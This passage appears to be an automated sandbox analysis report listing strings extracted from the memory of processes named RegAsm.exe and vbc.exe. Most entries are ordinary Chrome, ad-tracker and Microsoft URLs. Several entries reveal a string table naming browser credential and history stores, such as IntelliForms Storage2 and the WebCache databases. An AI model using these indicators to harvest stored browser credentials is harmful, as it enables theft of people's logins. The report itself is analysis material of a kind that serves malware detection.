Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317103637.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330049242.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: RegAsm.exe, 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000001.00000002.507298136.0000000003106000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.507684707.0000000003176000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.507061368.0000000003012000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.250900010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.260557591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.250194862.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507015977.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507883137.0000000002D53000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507560729.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: RegAsm.exe, 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000001.00000002.507298136.0000000003106000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.507684707.0000000003176000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.507061368.0000000003012000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.250900010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.260557591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.250194862.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507015977.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507883137.0000000002D53000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507560729.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe, 00000002.00000003.259269966.0000000002418000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258819074.0000000002418000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.259692750.0000000002418000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.260195881.0000000002418000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.281319669.0000000002268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.282249348.0000000002268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297987936.0000000000A08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.298543150.0000000000A08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297638157.0000000000A08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297665555.0000000000A08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.300106270.0000000002288000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.301530579.0000000002288000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecu
re%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000002.00000003.259179017.0000000002418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.co
m%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000006.00000003.280821648.0000000002268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.co
m%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 0000000A.00000003.299884129.0000000002288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F